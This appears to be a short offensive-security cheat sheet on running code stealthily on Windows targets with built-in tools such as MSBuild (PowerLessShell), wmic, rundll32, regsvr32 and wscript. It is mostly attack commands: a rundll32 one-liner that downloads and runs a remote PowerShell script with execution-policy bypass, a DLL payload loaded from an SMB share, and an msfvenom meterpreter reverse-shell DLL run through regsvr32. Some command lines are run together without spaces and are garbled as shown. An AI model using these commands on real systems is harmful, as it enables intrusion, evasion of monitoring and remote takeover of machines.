PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the PowerShell process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.
Checking the running processes on the target system whilst the shell is active shows no PowerShell.exe processes' running.
Wmic
# Execute binary on local systemwmic.exeprocesscallcreatec\windows\temp\Shell.exe# Execute binary on remote systemwmic.exe/node:"10.10.10.10"processcallcreate"Shell.exe"
Rundll32
# Execute JavaScript script that runs a PowerShell script from a remote serverrundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<File.ps1>');"
# Execute a JavaScript script that runs calc.exe.rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
# Execute a DLL on a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Regsvr32
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=445 -f dll -a x86 > Shell.dll
Upload to target system and execute.
regsvr32.exe c:\windows\temp\shell.dll
WScript
Wscript can be used to run vbs file's which can be executed within text files to bypass file extension blacklisting.
